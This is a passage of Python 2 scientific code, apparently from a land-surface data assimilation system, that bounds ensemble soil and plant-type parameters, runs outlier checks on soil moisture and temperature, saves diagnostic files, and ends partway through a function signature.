Parameter_Soil_Space_Ensemble_Median = numpy.median(Parameter_Soil_Space_Ensemble[:,Par_Index,:,:],axis=0)
Parameter_Soil_Space_Ensemble_Max = Parameter_Soil_Space_Ensemble_Median + Par_Soil_Uniform_STD[Par_Index_Sub]/(numpy.sqrt(1/12.0)*2.0)
Parameter_Soil_Space_Ensemble_Min = 2.0 * Parameter_Soil_Space_Ensemble_Median - Parameter_Soil_Space_Ensemble_Max
for Ens_Index in range(Ensemble_Number):
numexpr_a = Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]
numexpr_b = Parameter_Soil_Space_Ensemble_Min
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
numexpr_a = Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]
numexpr_b = Parameter_Soil_Space_Ensemble_Max
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
if numpy.size(Lower_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)+str(Ens_Index)))
Lower_Boundary_Ens = numpy.random.uniform(1.0,High_Ratio_Par,size=numpy.shape(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]))
#print numpy.shape(Lower_Index),numpy.shape(Lower_Boundary_Ens)
Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:][Lower_Index] = numpy.multiply(Lower_Boundary_Ens[Lower_Index],Parameter_Soil_Space_Ensemble_Min[Lower_Index])
del Lower_Boundary_Ens
if numpy.size(Upper_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)+str(Ens_Index)))
Upper_Boundary_Ens = numpy.random.uniform(Low_Ratio_Par,1.0,size=numpy.shape(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]))
Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:][Upper_Index] = numpy.multiply(Upper_Boundary_Ens[Upper_Index],Parameter_Soil_Space_Ensemble_Max[Upper_Index])
del Upper_Boundary_Ens
del Parameter_Soil_Space_Ensemble_Median,Parameter_Soil_Space_Ensemble_Max,Parameter_Soil_Space_Ensemble_Min
# Boundary Check
numexpr_a = Parameter_Soil_Space_Ensemble[:,Par_Index,:,:]
numexpr_b = Parameter_Range_Soil[0,Par_Index]
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
numexpr_a = Parameter_Soil_Space_Ensemble[:,Par_Index,:,:]
numexpr_b = Parameter_Range_Soil[1,Par_Index]
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
if numpy.size(Lower_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)))
#Upper = Parameter_Range_Soil[0,Par_Index] + Par_Soil_Uniform_STD[Par_Index_Sub]
Upper = Parameter_Range_Soil[0,Par_Index] + Par_Soil_Uniform_STD[Par_Index_Sub] / numpy.sqrt(1.0/12.0)
Lower_Boundary_Ens = numpy.random.uniform(Parameter_Range_Soil[0,Par_Index],Upper,size=numpy.shape(Parameter_Soil_Space_Ensemble[:,Par_Index,:,:]))
#print numpy.shape(Lower_Index),numpy.shape(Lower_Boundary_Ens)
Parameter_Soil_Space_Ensemble[:,Par_Index,:,:][Lower_Index] = Lower_Boundary_Ens[Lower_Index]
if numpy.size(Upper_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)))
#Lower = Parameter_Range_Soil[1,Par_Index] - Par_Soil_Uniform_STD[Par_Index_Sub]
Lower = Parameter_Range_Soil[1,Par_Index] - Par_Soil_Uniform_STD[Par_Index_Sub] / numpy.sqrt(1.0/12.0)
Upper_Boundary_Ens = numpy.random.uniform(Lower,Parameter_Range_Soil[1,Par_Index],size=numpy.shape(Parameter_Soil_Space_Ensemble[:,Par_Index,:,:]))
Parameter_Soil_Space_Ensemble[:,Par_Index,:,:][Upper_Index] = Upper_Boundary_Ens[Upper_Index]
Par_Index_Sub = Par_Index_Sub + 1
if Soil_Par_Sens[Dim_Soil_Par-1]:
Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:] = numpy.asarray(numpy.round(Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]),dtype=numpy.integer)
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)))
Lower_Boundary_Ens = numpy.random.randint(1,3,size=numpy.shape(Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]))
numexpr_a = Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]
numexpr_b = 1
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:][Lower_Index] = Lower_Boundary_Ens[Lower_Index]
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)))
Upper_Boundary_Ens = numpy.random.randint(1,3,size=numpy.shape(Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]))
numexpr_a = Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]
numexpr_b = 20
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:][Upper_Index] = Upper_Boundary_Ens[Upper_Index]
del Lower_Boundary_Ens,Upper_Boundary_Ens
#for Soil_Layer_Index_Sub in range(Dim_Soil_Par):
# print "*****************************2"
# print numpy.min(Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,:,:]),numpy.max(Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,:,:])
if Def_ParFor:
Parameter_Soil_Space_Ensemble = ParFor_Texture_Check(Dim_Soil_Par, Ensemble_Number, Row_Numbers, Col_Numbers, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Soil_Space_Ensemble, DAS_Depends_Path, omp_get_num_procs_ParFor)
else:
for Ens_Index in range(Ensemble_Number):
# Soil Texture Boundary Check
for Row_Index in range(Row_Numbers):
for Col_Index in range(Col_Numbers):
# if Sand + Clay is greater than their sum
for Soil_Layer_Index_Sub in range(Soil_Texture_Layer_Opt_Num):
Texture_Sum = (Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,Row_Index,Col_Index] + Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub+Soil_Texture_Layer_Opt_Num,Row_Index,Col_Index])
if Texture_Sum > 98.0:
Ratio = Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,Row_Index,Col_Index] / (Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,Row_Index,Col_Index]+Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub+Soil_Texture_Layer_Opt_Num,Row_Index,Col_Index])
Diff = Texture_Sum - 98.0
Diff_Part1 = Ratio*Diff
Diff_Part2 = Diff - Diff_Part1
Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,Row_Index,Col_Index] -= Diff_Part1
Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub+Soil_Texture_Layer_Opt_Num,Row_Index,Col_Index] -= Diff_Part2
del Texture_Sum,Ratio,Diff,Diff_Part1,Diff_Part2
#for Soil_Layer_Index_Sub in range(Dim_Soil_Par):
# print "*****************************3"
# print numpy.min(Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,:,:]),numpy.max(Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,:,:])
numexpr_a = Parameter_Soil_Space_Ensemble[:,2*Soil_Texture_Layer_Opt_Num:3*Soil_Texture_Layer_Opt_Num,:,:]
numexpr_b = 130.0
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Parameter_Soil_Space_Ensemble[:,2*Soil_Texture_Layer_Opt_Num:3*Soil_Texture_Layer_Opt_Num,:,:][numexpr_c] = 130.0
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if PFT_Par_Sens_Dim >= 1:
print "Assign the Optimized PFT Parameters to Model Input\n"
#print numpy.shape(Parameter_PFT_Space_Ensemble)
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
for Ens_Index in range(Ensemble_Number):
xa_temp = xa[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer),Ens_Index]
Analysis_Grid_Col = Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa_temp,dtype=numpy.float32)
Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
#Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:] = imadjust.imadjust(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:],numpy.min(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]),numpy.max(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]),Parameter_Min_Max[Par_Index,0],Parameter_Min_Max[Par_Index,1])
parm_infl_temp = parm_infl[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer)]
Analysis_Grid_Col = Parameter_PFT_Space_parm_infl[Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl_temp,dtype=numpy.float32)
Parameter_PFT_Space_parm_infl[Par_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Par_Index_Sub += 1
# Hard Boundary Check
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
# Remove the outliers based on the ensemble median
Parameter_PFT_Space_Ensemble_Median = numpy.median(Parameter_PFT_Space_Ensemble[:,Par_Index,:,:],axis=0)
Parameter_PFT_Space_Ensemble_Max = Parameter_PFT_Space_Ensemble_Median + Par_PFT_Uniform_STD[Par_Index_Sub]/(numpy.sqrt(1/12.0)*2.0)
Parameter_PFT_Space_Ensemble_Min = 2.0 * Parameter_PFT_Space_Ensemble_Median - Parameter_PFT_Space_Ensemble_Max
for Ens_Index in range(Ensemble_Number):
numexpr_a = Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]
numexpr_b = Parameter_PFT_Space_Ensemble_Min
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
numexpr_a = Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]
numexpr_b = Parameter_PFT_Space_Ensemble_Max
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
if numpy.size(Lower_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)+str(Ens_Index)))
Lower_Boundary_Ens = numpy.random.uniform(1.0,High_Ratio_Par,size=numpy.shape(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]))
#print numpy.shape(Lower_Index),numpy.shape(Lower_Boundary_Ens)
Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:][Lower_Index] = numpy.multiply(Lower_Boundary_Ens[Lower_Index],Parameter_PFT_Space_Ensemble_Min[Lower_Index])
del Lower_Boundary_Ens
if numpy.size(Upper_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)+str(Ens_Index)))
Upper_Boundary_Ens = numpy.random.uniform(Low_Ratio_Par,1.0,size=numpy.shape(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]))
Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:][Upper_Index] = numpy.multiply(Upper_Boundary_Ens[Upper_Index],Parameter_PFT_Space_Ensemble_Max[Upper_Index])
del Upper_Boundary_Ens
del Parameter_PFT_Space_Ensemble_Median,Parameter_PFT_Space_Ensemble_Max,Parameter_PFT_Space_Ensemble_Min
# Boundary Check
numexpr_a = Parameter_PFT_Space_Ensemble[:,Par_Index,:,:]
numexpr_b = Parameter_Range_PFT[0,Par_Index]
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
numexpr_a = Parameter_PFT_Space_Ensemble[:,Par_Index,:,:]
numexpr_b = Parameter_Range_PFT[1,Par_Index]
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
if numpy.size(Lower_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)))
#Upper = Parameter_Range_PFT[0,Par_Index] + Par_PFT_Uniform_STD[Par_Index_Sub]
Upper = Parameter_Range_PFT[0,Par_Index] + Par_PFT_Uniform_STD[Par_Index_Sub] / numpy.sqrt(1.0/12.0)
Lower_Boundary_Ens = numpy.random.uniform(Parameter_Range_PFT[0,Par_Index],Upper,size=numpy.shape(Parameter_PFT_Space_Ensemble[:,Par_Index,:,:]))
#print numpy.shape(Lower_Index),numpy.shape(Lower_Boundary_Ens)
Parameter_PFT_Space_Ensemble[:,Par_Index,:,:][Lower_Index] = Lower_Boundary_Ens[Lower_Index]
if numpy.size(Upper_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)))
#Lower = Parameter_Range_PFT[1,Par_Index] - Par_PFT_Uniform_STD[Par_Index_Sub]
Lower = Parameter_Range_PFT[1,Par_Index] - Par_PFT_Uniform_STD[Par_Index_Sub] / numpy.sqrt(1.0/12.0)
Upper_Boundary_Ens = numpy.random.uniform(Lower,Parameter_Range_PFT[1,Par_Index],size=numpy.shape(Parameter_PFT_Space_Ensemble[:,Par_Index,:,:]))
Parameter_PFT_Space_Ensemble[:,Par_Index,:,:][Upper_Index] = Upper_Boundary_Ens[Upper_Index]
Par_Index_Sub = Par_Index_Sub + 1
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
#if Write_DA_File_Flag:
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Analysis_Parameter.txt', xm)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Analysis_Ens_Parameter.txt', xa)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Innovation_Parameter.txt',numpy.mean(innovation,axis=1))
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Increments_Parameter.txt',numpy.mean(increments,axis=1))
#if Write_DA_File_Flag:
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Analysis_State.txt', xm)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Localization_map_col.txt', localization_map_col)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Analysis_Ens_State.txt', xa)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Bias_Analysis_State.txt', bias_a)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Innovation_State.txt',numpy.mean(innovation,axis=1))
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Increments_State.txt',numpy.mean(increments,axis=1))
for Ens_Index in range(Ensemble_Number):
Innovation_State_Col = Innovation_State[Ens_Index,:,:].flatten()
Innovation_State_Col[Obs_Index] = numpy.asarray(innovation[0:ny,Ens_Index],dtype=numpy.float32)
Innovation_State[Ens_Index,:,:] = numpy.reshape(Innovation_State_Col, (Row_Numbers, -1))
Increments_State_Col = Increments_State[Ens_Index,:,:].flatten()
Increments_State_Col[~Mask_Index_Single_Layer] = numpy.asarray(increments[0:State_DIM_Single_Layer,Ens_Index],dtype=numpy.float32)
Increments_State[Ens_Index,:,:] = numpy.reshape(Increments_State_Col, (Row_Numbers, -1))
del Innovation_State_Col,Increments_State_Col
#os.abort()
#Analysis_Grid[:,:] = (CLM_Soil_Moisture[:,:,0]+Observation_Matrix[:,:])/2.0
#Analysis_Grid[:, :] = Prop_Grid_Array_Sys[:,:]
Analysis_Grid_Col = Analysis_Grid.flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xm,dtype=numpy.float32)
Analysis_Grid = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
del Analysis_Grid_Col
Localization_Map_Mask = numpy.zeros_like(Analysis_Grid)
Localization_Map_Mask_Col = Localization_Map_Mask.flatten()
Localization_Map_Mask_Col[~Mask_Index_Single_Layer] = localization_map_col
Localization_Map_Mask = numpy.reshape(Localization_Map_Mask_Col, (Row_Numbers, -1))
del Localization_Map_Mask_Col
xm = []
xa_temp = []
localization_map_col = []
Lower_Index = []
Upper_Index = []
parm_infl_temp = []
Lower_Boundary_Ens = []
Upper_Boundary_Ens = []
numexpr_a = Land_Mask_Data
numexpr_b = NAvalue
numexpr_c = numpy.where(numexpr_a == numexpr_b)
NA_Index_Analysis_Grid = numexpr_c
if Def_Print >= 2:
print "NA_Index_Analysis_Grid",NA_Index_Analysis_Grid
# print numpy.min(Analysis_Grid),numpy.max(Analysis_Grid)
# print numpy.min(Teta_Residual[Soil_Layer_Index_DA,::]),numpy.max(Teta_Saturated[Soil_Layer_Index_DA,::])
if Write_DA_File_Flag:
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/Analysis_Grid.txt', Analysis_Grid)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/Localization_Map_Mask.txt', Localization_Map_Mask)
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# State Estimation
if Def_Print:
print "Check the Ourliers"
NA_Flag = False
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, Analysis_Grid, NA_Flag, SensorVariable, Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
#print numpy.min(Analysis_Grid)
if Def_Print:
print "Check the Ourliers"
NA_Flag = False
for Ens_Index in range(Ensemble_Number):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, Analysis_Grid_Array[Ens_Index,::], NA_Flag, SensorVariable, Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if Def_Print:
print "Check the Ourliers"
NA_Flag = False
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index], NA_Flag, SensorVariable, Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index,:,:], Teta_Saturated[Soil_Layer_Index,:,:], Teta_Field_Capacity[Soil_Layer_Index,:,:], Teta_Wilting_Point[Soil_Layer_Index,:,:], NAvalue)
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for Ens_Index in range(Ensemble_Number):
#CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = Analysis_Grid_Array[Ens_Index,::]
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index], NA_Flag, 'Soil_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index], NA_Flag, 'Vegetation_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
for Soil_Layer_Index in range(Soil_Layer_Num):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index], NA_Flag, 'Soil_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index,:,:], Teta_Saturated[Soil_Layer_Index,:,:], Teta_Field_Capacity[Soil_Layer_Index,:,:], Teta_Wilting_Point[Soil_Layer_Index,:,:], NAvalue)
if (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
if Def_Print:
print "Check the Ourliers"
NA_Flag = False
for Ens_Index in range(Ensemble_Number):
#CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = Analysis_Grid_Array[Ens_Index,::]
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index], NA_Flag, 'Soil_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index], NA_Flag, 'Vegetation_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
for Soil_Layer_Index in range(Soil_Layer_Num):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index], NA_Flag, 'Soil_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index,:,:], Teta_Saturated[Soil_Layer_Index,:,:], Teta_Field_Capacity[Soil_Layer_Index,:,:], Teta_Wilting_Point[Soil_Layer_Index,:,:], NAvalue)
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index], NA_Flag, "Soil_Moisture", Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index,:,:], Teta_Saturated[Soil_Layer_Index,:,:], Teta_Field_Capacity[Soil_Layer_Index,:,:], Teta_Wilting_Point[Soil_Layer_Index,:,:], NAvalue)
if Def_ReBEL_Temp == 1:
#============== Memory Collection
del Mask, Mask_Index, Mask_Copy, Mask_Index_Single_Layer, Mask_False, Obs_Grid, h, R
del Obs_Index, xa, innovation, increments, localization_map, bias_a
del xm, localization_map_col, xa_temp, parm_infl_temp
Analysis_Grid_Col = []
Innovation_State_Col = []
Increments_State_Col = []
Localization_Map_Mask_Col = []
del numexpr_a,numexpr_b,numexpr_c,NA_Index_Analysis_Grid
del pyper, Call_ReBEL_Octave, gssm_das_octave, letkf, letkf_common
del Bias_Model_Uniform_STD, Bias_Obs_Uniform_STD, Model_Inflation_Uniform_STD
gc.collect()
del gc.garbage[:]
return Analysis_Grid, Analysis_Grid_Array, Localization_Map_Mask, \
CLM_Ground_Temperature_Ensemble_Mat, CLM_Vegetation_Temperature_Ensemble_Mat, CLM_Soil_Moisture_Ensemble_Mat, CLM_Soil_Temperature_Ensemble_Mat, PF_PRESSURE_Ensemble_Mat, PF_SATURATION_Ensemble_Mat, \
Prop_Grid_Array_Sys_parm_infl, CLM_Latent_Heat_parm_infl, CLM_Surface_Temperature_parm_infl, CLM_Ground_Temperature_parm_infl, CLM_Vegetation_Temperature_parm_infl, CLM_Soil_Moisture_parm_infl, CLM_Soil_Temperature_parm_infl, PF_SATURATION_parm_infl,\
CLM_Ground_Temperature_Ensemble_Mat_Bias, CLM_Vegetation_Temperature_Ensemble_Mat_Bias, CLM_Soil_Moisture_Ensemble_Mat_Bias, CLM_Soil_Temperature_Ensemble_Mat_Bias, \
CLM_Surface_Temperature_parm_infl_Bias, CLM_Ground_Temperature_parm_infl_Bias, CLM_Vegetation_Temperature_parm_infl_Bias, CLM_Soil_Moisture_parm_infl_Bias, CLM_Soil_Temperature_parm_infl_Bias,\
Prop_Grid_Array_Bias, Observation_Bias, Prop_Grid_Array_Sys_parm_infl_Bias, Observation_parm_infl_Bias, \
Parameter_Soil_Space_Ensemble, Parameter_Soil_Space_parm_infl, Parameter_Veg_Space_Ensemble, Parameter_Veg_Space_parm_infl, Parameter_PFT_Space_Ensemble, Parameter_PFT_Space_parm_infl, \
Parameter_Hard_Space_Ensemble, Parameter_Hard_Space_parm_infl, Innovation_State, Increments_State
def Block_Assim(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD,
Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs, eps, msw_infl, Post_Inflation_Alpha, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
